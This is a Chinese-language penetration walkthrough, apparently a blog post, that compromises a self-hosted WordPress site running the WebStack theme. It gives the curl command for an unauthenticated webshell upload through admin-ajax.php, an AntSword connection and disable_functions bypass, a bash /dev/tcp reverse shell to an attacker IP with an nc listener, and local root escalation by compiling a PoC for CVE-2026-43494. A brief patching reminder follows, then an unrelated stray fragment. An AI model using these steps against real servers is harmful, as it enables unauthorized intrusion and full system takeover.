前段时间Webstack写马漏洞公开
渗透思路如下:
从webstack写马→蚁剑连接→绕过disable_functions→nc反弹→exp提权
实操开始
靶场我用自建WordPress
要看一个webstack站点有没有漏洞可以访问
wp-admin/admin-ajax.php?action=img_upload路径
如果显示0如图,那十有八九就是有这个漏洞
开始写马
在当前目录下创建好木马php文件
然后运行命令上传木马
curl -F "files=@shell.php" https://目标站点/wp-admin/admin-ajax.php?action=img_upload
如图,返回上传成功和木马地址
直接访问木马地址
显示白页,说明木马正常可用
蚁剑连接
测试连接显示成功,然后直接添加
然后打开虚拟终端
发现任何命令都无法执行,原因是禁用了函数,这里需要用到蚁剑插件
绕过 disable_functions
使用蚁剑绕函数插件
靶场php版本为8.1选择对应模式,点击开始
发现命令可成功执行
接下来就直接开始反弹了
Bash反弹
蚁剑虚拟终端(靶机)运行bash -i >& /dev/tcp/攻击机IP/4444 0>&1
攻击机运行
nc -lvnp 4444
用来监听4444端口
此处需攻击机先监听端口,靶机再执行反弹命令
反弹连接成功,
执行cat /etc/os-release命令看看操作系统,发现是乌班图26系统,然后执行lsmod | grep rds命令,发现模块也开启了
刚好可以复现CVE-2026-43494
开始测试
通过蚁剑上传poc
然后运行gcc -O CVE-2026-43494.c -o exp编译poc
运行命令
file exp看看文件编译成功没
看得到exp文件是编译成功
开始提权
直接运行./exp
出现如图不报错,等待一会
直接whoami查看当前用户
显示root用户,输入id回车也是root用户
至此整场渗透结束
结束语
最后,请大家多注重网络安全,及时更新内核,补丁,防患于未然。
的diagonal参数:从-2到2,一张图搞定所有变化)
